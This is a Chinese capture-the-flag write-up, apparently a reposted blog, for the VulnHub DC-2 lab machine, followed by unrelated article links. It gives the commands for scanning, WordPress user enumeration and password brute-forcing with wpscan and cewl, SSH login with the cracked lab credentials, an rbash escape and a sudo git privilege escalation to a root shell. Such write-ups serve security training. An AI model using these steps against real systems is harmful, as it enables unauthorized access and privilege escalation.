Vulnhub靶机 DC-2渗透详细过程

news2024/9/24 3:20:19

VulnHub靶机 DC-2 打靶

目录

  • VulnHub靶机 DC-2 打靶
    • 一、将靶机导入到虚拟机当中
    • 二、攻击方式
      • 主机发现
      • 端口扫描
      • 服务探针
      • 爆破目录
      • web渗透
        • 信息收集
        • 扫描探针
        • 登录密码爆破
        • SSH远程登录
        • rbash
        • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-2,311/

image-20240413222236297

二、攻击方式

主机发现

使用arp-scan命令探测主机,或者使用nmap命令也可

image-20240413222052488

端口扫描

nmap -p- 10.1.2.154

image-20240413224851067

服务探针

image-20240413224919104

image-20240413225409159

开发80端口,访问一下web服务界面

爆破目录

dirsearch -u http://dc-2 -i 200

发现登录界面

image-20240413231739922

image-20240413231805112

web渗透

来到web界面首页得到flag提示信息

image-20240413225525231

翻译:

你通常的词汇表可能不会起作用,所以,也许你只需要保持冷静(cewl)。
密码越多越好,但有时候你就是赢不了所有密码。
以一个登录查看下一个标志。
如果找不到,请以另一个身份登录。
信息收集

发现此web服务的一些信息和采用的CMS

image-20240413225803367

发现网站采用WordPress CMS ,那么来到kali端使用wpscan工具进行对网站扫描

扫描探针
wpscan --url http://dc-2 -e u

得到三个登录用户,将其保存到记事本当中,跟前前面的flag提示,使用cewl命令针对网站来生成密码,并保存到记事本当中,后面进行爆破

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

image-20240413230014363

使用cewl命令行工具,对网站进行生成字典,保存到passwd.txt当中

cewl http://dc-2 -w passwd.txt

image-20240413231205409

登录密码爆破

使用wpscan工具进行爆破

wpscan --url http://dc-3 -U user.txt -P passwd.txt 

image-20240413231314544

开始爆破,成功爆破出Jerry和tom的密码,等了web后台

image-20240413231352974

image-20240413231451256

用户名:tom
密码:parturient

用户名:jerry
密码:adipiscing

拿到用户名和密码登录网站后台,找到flag2

image-20240413233904659

image-20240413233848623

翻译:

如果您无法利用 WordPress 并走捷径,还有另一种方法。

希望你找到了另一个切入点。
SSH远程登录

这里没有什么利用点。开始的端口扫描,发现此将ssh端口改为7744,那么我们尝试将上面得到的用户名和密码再次进行SSH远程登录尝试

ssh tom@10.1.2.154 -p 7744
ssh jerry@10.1.2.154 -p 7744

发现tom可以远程登录成功,发现当前目录下有flag3.txt

没有cat命令,可以尝试其他可以产看文件的命令

image-20240413234231307

内容:

image-20240413234310700

翻译:

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示)
rbash

可看到出现su命令提示,我们尝试切换到Jerry用户,发现没有su ,我们需要rbash逃逸

image-20240413234527442

BASH_CMDS[su]=/bin/sh

su

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

su jerry
输入jerry的密码,前面收集爆破到的密码

image-20240414000250524

成功切换到jerry用户处,回到jerry的家目录,找到flag4.txt查看即可

image-20240414000403765

翻译:

很高兴看到你已经走了这么远-但你还没回家。你仍然需要得到最后的旗帜(唯一真正重要的旗帜!!!)这里没有提示-你现在是在你自己。:-)
走吧-离开这里!!!!(git)
提权

使用git提权即可

sudo git branch --help config
!/bin/sh

image-20240414000852688

well done!
恭喜你啊!!!

文章不妥之处,欢迎批评指正!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1596199.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

51单片机入门_江协科技_27~28_OB记录的自学笔记_AT24C02数据存储秒表

27. AT24C02(I2C总线) 27.1. 存储器介绍 27.2. 存储器简化模型介绍,存储原理 27.3. AT24C02介绍 •AT24C02是一种可以实现掉电不丢失的存储器,可用于保存单片机运行时想要永久保存的数据信息 •存储介质:E2PROM •通讯接口:I2…

如何在Linux系统部署Joplin笔记并结合内网穿透实现无公网IP远程访问

文章目录 1. 安装Docker2. 自建Joplin服务器3. 搭建Joplin Sever4. 安装cpolar内网穿透5. 创建远程连接的固定公网地址 Joplin 是一个开源的笔记工具,拥有 Windows/macOS/Linux/iOS/Android/Terminal 版本的客户端。多端同步功能是笔记工具最重要的功能,…

极大似然估计、最大后验估计、贝叶斯估计

机器学习笔记 第一章 机器学习简介 第二章 感知机 第三章 支持向量机 第四章 朴素贝叶斯分类器 第五章 Logistic回归 第六章 线性回归和岭回归 第七章 多层感知机与反向传播【Python实例】 第八章 主成分分析【PCA降维】 第九章 隐马尔可夫模型 第十章 奇异值分解 第十一章 熵…

NzN的数据结构--外排序

接上文,本篇向大家简单展示一下外排序的实现。先三连后看才是好习惯!!! 在我们刚接触数据结构的时间里,我们只需要对外排序简单了解一下即可,重点要掌握的还是前面我们介绍的比较排序和非比较排序里的计数排…

基于java的社区生活超市管理系统

开发语言:Java 框架:ssm 技术:JSP JDK版本:JDK1.8 服务器:tomcat7 数据库:mysql 5.7(一定要5.7版本) 数据库工具:Navicat11 开发软件:eclipse/myeclip…

爱比对软件:您的文本比对专家

在处理文本时,无论是学术研究、法律审查还是软件开发,精确的文本比对都至关重要。爱比对软件通过先进的技术,为您提供了一系列核心功能,旨在优化您的工作流程和数据管理,确保您的文档内容准确无误。 爱比对软件&#…

白盒测试之语句覆盖与分支(判定)覆盖

白盒测试之语句覆盖与分支(判定)覆盖(蓝桥云学习笔记) 1、语句覆盖 实验介绍 白盒测试的目的是通过检查软件内部的逻辑结构,对软件中的逻辑路径进行覆盖测试。控制流分析是白盒测试中的一种重要测试方法,…

实时传输,弹性优先——物联网通讯打造数据上传新标杆

随着信息技术的飞速发展,物联网技术已经成为连接物理世界和数字世界的桥梁。在物联网领域,数据上传的速度、稳定性和灵活性是评价通讯技术优劣的重要指标。近年来,物联网通讯在实时传输、弹性优先方面取得了显著进展,为数据上传树…

第42篇:随机存取存储器(RAM)模块<一>

Q:本期开始我们分期介绍随机存取存储器(RAM)模块及其设计实现方法。 A:随机存储器RAM,即工作时可以随时从一个指定地址读出数据,也可以随时将数据写入一个指定的存储单元。 DE2-115开发板上的Cyclone IV …

java-通过maven导入本地jar包常见的两种方式

一、准备工作 1.1 写一个小demo,将其打包 1.2 再新建一个项目,并在项目文件夹里新建一个lib文件夹,将上个jar包放进去。 二、方法一(重要) 找到那个小demo 的pom 文件将其中的三个信息拷贝到新项目中去 接着 调用demo…

【计算机系统结构】流水方式(续)

📝本文介绍 本文总结了流水机器的相关处理以及非线性流水线的调度 👋作者简介:一个正在积极探索的本科生 📱联系方式:943641266(QQ) 🚪Github地址:https://github.com/sankexilianhua &#x1f…

2A大电流线性稳压器具备两种输出电压范围

概述 PCD3931 是一款低噪声、低压差线性稳压器 (LDO),可提供 2A 输出电流,最大压降仅为 160mV。该器件提供两种输出电压范围。 PCD3931 的输出电压可通过外部电阻分压器在 0.5V 至 5.5V 范围内进行调节。PCD3931 集低噪声、高 PSRR 和高输出电流能力等特…

国密证书VS国外证书:选哪种更靠谱?一文带你了解优劣势!

在数字化生活的今天,无论是网上购物、在线支付还是远程办公,我们的信息安全和隐私保护都显得尤为重要。而数字证书,就像是一把“信任钥匙”,帮助我们确认信息的真实性和保护数据的安全。但是,面对国密证书和国外品牌证…

Java | Leetcode Java题解之第22题括号生成

题目&#xff1a; 题解&#xff1a; class Solution {static List<String> res new ArrayList<String>(); //记录答案 public List<String> generateParenthesis(int n) {res.clear();dfs(n, 0, 0, "");return res;}public void dfs(int n ,int…

【派兹互连-SailWind】这家公司悄然入局,国产EDA突围又有新看头了!

从光刻机到EDA软件&#xff0c; 国产厂商何以突围&#xff1f; 两年前&#xff0c;美发布禁令直接把对中国大陆半导体产业的限制&#xff0c;从光刻机扩大到集成电路所必需的EDA软件领域&#xff0c;在此之前华为因被美国列入实体清单&#xff0c;被三大海外EDA巨头断供&…

MOM系统:制造企业的“神级助手“!

一、大环境下的智能化改造 嘿&#xff0c;亲爱的制造企业老板们&#xff0c;你们是否曾经为生产计划混乱、物料和设备管理无序、产品质量不稳定等等问题而头疼不已&#xff1f;现在&#xff0c;有一个超级助手可以帮助你们解决这些问题&#xff0c;那就是MOM系统&#xff01;什…

《前端面试题》- JS基础 - 伪数组

第一次听说伪数组这个概念&#xff0c;听到的时候还以为是说CSS的伪类呢&#xff0c;网上一查&#xff0c;这东西原来还是个很常见的家伙。 何为伪数组 伪数组有两个特点&#xff1a; 具有length属性&#xff0c;其他属性&#xff08;索引&#xff09;为非负整数但是却不具备…

Python 操作 json 数据

在Python中&#xff0c;操作JSON数据主要包括序列化&#xff08;将Python对象转换为JSON格式&#xff09;和反序列化&#xff08;将JSON字符串转换回Python对象&#xff09;。 以下是使用Python内置的json模块进行这些操作的基本示例&#xff1a; JSON 序列化 (Serialization…

记一次事件到供应链的顶级拉扯

前言 某天&#xff0c;夜里3点 天刚蒙蒙亮 开局&#xff1a;我有一个朋友~ 看不懂发的什么意思&#xff0c;再仔细看看&#xff0c;懂了! 闲言少叙&#xff0c;遇事不决先上bp&#xff0c;启动&#xff01; 进去之后发现基本没什么实际功能点&#xff0c;像假的一样。注意这里…

怎么修改图片大小?在线图片处理的方法介绍

在日常生活中&#xff0c;我们经常需要调整图片大小以适应不同的网络上传要求。不管是微信、QQ换头像背景图片&#xff0c;还是各种社交媒体相册&#xff0c;都需要对图片改大小&#xff0c;今天就介绍几个关于修改图片大小的方法&#xff0c;可以不用下载安装就能在线图片处理…